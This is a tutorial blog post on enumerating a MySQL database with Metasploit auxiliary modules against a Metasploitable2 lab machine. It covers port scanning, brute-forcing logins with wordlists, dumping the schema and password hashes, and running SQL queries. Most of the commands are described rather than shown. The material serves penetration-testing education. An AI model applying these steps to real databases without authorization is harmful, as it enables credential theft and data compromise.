Cyber reconnaissance is the most significant phase to stimulate an attack. Without any prior knowledge of a victim and the weaknesses that can help to exploit the target, the attack could not be successfully generated.
Talking about target, Cyber world is not entirely an internet but a lot more than that. It is an entity of independent networks containing telecommunication networks, databases, smart devices and web applications. There are different tricks and techniques to exploit each of them depending upon the information we get after reconnaissance.
Exploiting database is a key target for cyber criminals due to a valuable information storage and a number of loopholes including deployment failures, broken databases, data leak, stolen database backup, lack of segregation, SQL injections and database inconsistencies.
Any information related to database is advantageous to an attacker when it comes to generate an attack. Whether the information is about the version of database or the structure of database can render more juicy information to plan a strategy. If the version of database is outdated, it can be easily attacked through finding a suitable exploit. Moreover, weak credentials of low secure databases can help to use credential reusability or brute-forcing credentials to compromise highly secured database. Lastly getting knowledge of the schema of database is vital to perform SQL injection attack.
So today we are going to enumerate some of this information related to MYSQL database. We will use Metasploit framework as it includes many effective auxiliary modules to easily exploit the target. Use Metasploit framework via Kali Linux and target Metasploitable2 to observe the output.
Table of Contents
- Scanning
- Cracking the Credentials
- Use MYSQL Enumerator to get the Information
- Dump Database Schema
- Find Hashes of MYSQL Passwords
- Execute SQL Queries
Scanning
The first ever step of reconnaissance is scanning the target. It will determine if the MYSQL database is running on victim’s machine. As we know it runs on port 3306, use Nmap with the target’s IP to scan the target:# NMAP 192.168.0.101 -P 3306
It shows that MYSQL is running on the target and the port is open.
Its time to enumerate this database and get information as much as you can collect to plan a better strategy.
Execute Metasploit framework by typing msfconsole on the Kali prompt:
Search all modules of MYSQL that can be helpful to generate an exploit. Type search mysql:
It listed a number of modules. As of now we are only concerned with the auxiliary scanners.
Cracking the Credentials
Let’s try mysql_login module first to crack some valid credentials of the MYSQL. Type use command to load the module:USE AUXILIARY/SCANNER/MYSQL/MYSQL_LOGIN
Type options to see the current settings of this module:
Now create a file including a list of common usernames. I just prepared a short list for the demonstration purpose but in real, publicly available longer lists have been used to crack the credentials. Name it as you want:
Add some common usernames and save it:
Again, create a file containing common passwords. Usually a longer list has been used but as it will take more time to complete the module, we will keep it short. Add the passwords and save the file:
Set the created files i.e. ehacking_user.txt and passwords.txt to read the usernames and passwords from these files:
As MYSQL gives permission to login with a blank password therefore set this option true to check for blank passwords:
Set the target IP address. Use setg command to set this option globally since we are going to execute all modules on the same target:
All settings are done now run the module by typing exploit:
This module tries all the possible combination provided from the text files of usernames and passwords. It extracts some of valid logins while trying the combinations.
So far it can be seen that only ‘root’ and ‘guest’ are the valid logins and they are using blank passwords. This can be tricky as it takes some time to crack the credentials but eventually it is not impossible to get the desired output.
Use MYSQL Enumerator to get the Information
The sql-enum module automatically enumerates useful information about the database i.e. server information, version, data directories and many other options that can be easily configured in MYSQL.Let’s get started by loading the module:
Once the module is loaded type show options to see the current setting of this module.
It shows that the target IP has already set as, previously we used the global option. The port number is set as default now the only thing remaining to be configured is the username. Set the username as ‘root’ or ‘guest’ since we already know MYSQL allows to login from these usernames with blank password. Set this option globally:
Now run the exploit:
It enumerates the information including version name, server host name, data directory, SSL connection state and many more which will be helpful to the attacker.
Dump Database Schema
The mysql_schemadump module used to dump schema information of the database. Schema is nothing but a blueprint of a database referring information about the design of database and the organizational details of number of rows and columns. This can help to find the key information of the database in the reconnaissance phase.Load the module and type show options to see configuration:
Every entity is set so now let’s run the module:
As mentioned earlier, it will give a lot of juicy information about the schema and Metasploit could save the loot into a text file to provide convenience.
Find Hashes of MYSQL Passwords
The next module we will try is the mysql_hashdump module simply gather password hashes if it finds in a database. This module is very useful in pivoting to other systems, indicating reusability of passwords and gaining root access to another system.Load the module and type show options:
Again, all the parameters are already set now run the module:
It can be seen that it saves the hashes as loot after completion. Since our target does not have a password set, this returns nothing, and we don’t get any hash.
Execute SQL Queries
The last module we will use is mysql_sql, that can run SQL queries in the Metasploit framework.Load the module and see the current options:
Every parameter is set except we need to configure the SQL query and run it against the target. The most familiar command while connecting to a database is ‘show databases’ that will list down all the possible databases to use:
First, set the option to sql show databases:
Run the module:
And there you go, getting a bunch of different databases available in this instance of MYSQL.
We have used a number of Metasploit Auxiliary modules to extract valuable information of MYSQL Databases. These modules help us to crack the credentials, getting schema information, creating a list of password hashes and other important information which can be used to exploit the target and perform several malicious activities including SQL Injection.